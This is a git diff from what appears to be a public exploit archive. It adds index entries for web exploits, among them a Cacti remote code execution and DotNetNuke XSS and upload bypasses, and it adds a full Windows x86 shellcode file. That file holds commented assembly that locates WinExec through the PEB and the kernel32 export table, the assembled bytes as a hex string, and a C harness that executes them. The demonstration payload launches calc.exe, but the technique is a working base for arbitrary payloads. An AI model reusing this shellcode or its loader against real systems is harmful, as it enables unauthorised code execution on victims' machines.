+48124,exploits/aspx/webapps/48124.txt,"DotNetNuke 9.5 - Persistent Cross-Site Scripting",2020-02-24,"Sajjad Pourali",webapps,aspx, +48125,exploits/aspx/webapps/48125.txt,"DotNetNuke 9.5 - File Upload Restrictions Bypass",2020-02-24,"Sajjad Pourali",webapps,aspx, +48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware, +48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index acc690e2d..b8bdbc71e 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1015,3 +1015,4 @@ id,file,description,date,author,type,platform 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux +48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 diff --git a/shellcodes/windows_x86/48116.c b/shellcodes/windows_x86/48116.c new file mode 100644 index 000000000..521b0efe8 --- /dev/null +++ b/shellcodes/windows_x86/48116.c @@ -0,0 +1,147 @@ +# Title: Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) +# Shellcode Author: Bobby Cooke +# Date: 2020-02-21 +# Technique: PEB & Export Directory Table +# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 + +_start: +; Create a new stack frame + mov ebp, esp ; Set base stack pointer for new stack-frame + sub esp, 0x20 ; Decrement the stack by 32 bytes + +; Find kernel32.dll base address + xor ebx, ebx ; EBX = 0x00000000 + mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB + mov ebx, [ebx+0xC] ; EBX = Address_of_LDR + mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll + mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll + mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll + mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll + mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll + +; Find the address of the WinExec Symbol within kernel32.dll +; + The hex values will change with different versions of Windows + +; Find the address of the Export Table within kernel32.dll + mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader = 0xF8 + add ebx, eax ; EBX = &NewEXEHeader = 0xF8 + &kernel32.dll + mov ebx, [ebx+0x78] ; EBX = RVA ExportTable = 0x777B0 = [&NewExeHeader + 0x78] + add ebx, eax ; EBX = &ExportTable = RVA ExportTable + &kernel32.dll + +; Find the address of the Name Pointer Table within kernel32.dll +; + Contains pointers to strings of function names - 4-byte/dword entries + mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable = 0x790E0 + add edi, eax ; EDI = &NamePointerTable = 0x790E0 + &kernel32.dll + mov [ebp-0x8], edi ; save &NamePointerTable to stack frame + +; Find the address of the Ordinal Table +; - 2-byte/word entries + mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable = 0x7A9E8 + add ecx, eax ; ECX = &OrdinalTable = 0x7A9E8 + &kernel32.dll + mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame + +; Find the address of the Address Table + mov edx, [ebx+0x1C] ; EDX = RVA AddressTable = 0x777CC + add edx, eax ; EDX = &AddressTable = 0x777CC + &kernel32.dll + mov [ebp-0x10], edx ; save &AddressTable to stack-frame + +; Find Number of Functions within the Export Table of kernel32.dll + mov edx, [ebx+0x14] ; EDX = Number of Functions = 0x642 + mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame + +jmp short functions + +findFunctionAddr: +; Initialize the Counter to prevent infinite loop + xor eax, eax ; EAX = Counter = 0 + mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame +; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll +searchLoop: + mov edi, [ebp-0x8] ; EDI = &NamePointerTable + mov esi, [ebp+0x18] ; ESI = Address of String for the Symbol we are searching for + xor ecx, ecx ; ECX = 0x00000000 + cld ; clear direction flag - Process strings from left to right + mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] + add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll + add cx, 0x8 ; ECX = len("WinExec,0x00") = 8 = 7 char + 1 Null + repe cmpsb ; compare first 8 bytes of [&NameString] to "WinExec,0x00" + jz found ; If string at [&NameString] == "WinExec,0x00", then end loop + inc eax ; else Counter ++ + cmp eax, edx ; Does EAX == Number of Functions? + jb searchLoop ; If EAX != Number of Functions, then restart the loop + +found: +; Find the address of WinExec by using the last value of the Counter + mov ecx, [ebp-0xC] ; ECX = &OrdinalTable + mov edx, [ebp-0x10] ; EDX = &AddressTable + mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)] + mov eax, [edx + eax*4] ; EAX = RVA WinExec = [&AddressTable + ordinalNumber] + add eax, [ebp-0x4] ; EAX = &WinExec = RVA WinExec + &kernel32.dll + ret + +functions: +; Create string 'WinExec\x00' on the stack and save its address to the stack-frame + mov edx, 0x63657878 ; "cexx" + shr edx, 8 ; Shifts edx register to the right 8 bits + push edx ; "\x00,cex" + push 0x456E6957 ; EniW : 456E6957 + mov [ebp+0x18], esp ; save address of string 'WinExec\x00' to the stack-frame + call findFunctionAddr ; After Return EAX will = &WinExec + +; Call WinExec( CmdLine, ShowState ); +; CmdLine = "calc.exe" +; ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window + xor ecx, ecx ; clear eax register + push ecx ; string terminator 0x00 for "calc.exe" string + push 0x6578652e ; exe. : 6578652e + push 0x636c6163 ; clac : 636c6163 + mov ebx, esp ; save pointer to "calc.exe" string in eax + inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 + push ecx ; uCmdShow - push 0x1 to stack # 2nd argument + push ebx ; lpcmdLine - push string address stack # 1st argument + call eax ; Call the WinExec Function + +; Create string 'ExitProcess\x00' on the stack and save its address to the stack-frame + xor ecx, ecx ; clear eax register + mov ecx, 0x73736501 ; 73736501 = "sse",0x01 // "ExitProcess",0x0000 string + shr ecx, 8 ; ecx = "ess",0x00 // shr shifts the register right 8 bits + push ecx ; sse : 00737365 + push 0x636F7250 ; corP : 636F7250 + push 0x74697845 ; tixE : 74697845 + mov [ebp+0x18], esp ; save address of string 'ExitProcess\x00' to stack-frame + call findFunctionAddr ; After Return EAX will = &ExitProcess + +; Call ExitProcess(ExitCode) + xor edx, edx + push edx ; ExitCode = 0 + call eax ; ExitProcess(ExitCode) + +; nasm -f win32 win32-WinExec_Calc-Exit.asm -o win32-WinExec_Calc-Exit.o +; for i in $(objdump -D win32-WinExec_Calc-Exit.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo + +##################################################################################### + +#include +#include + +char code[] = \ +"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b" +"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3" +"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24" +"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14" +"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18" +"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74" +"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41" +"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52" +"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51" +"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff" +"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f" +"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2" +"\x52\xff\xd0"; + +int main(int argc, char **argv) +{ + int (*func)(); + func = (int(*)()) code; + (int)(*func)(); +} \ No newline at end of file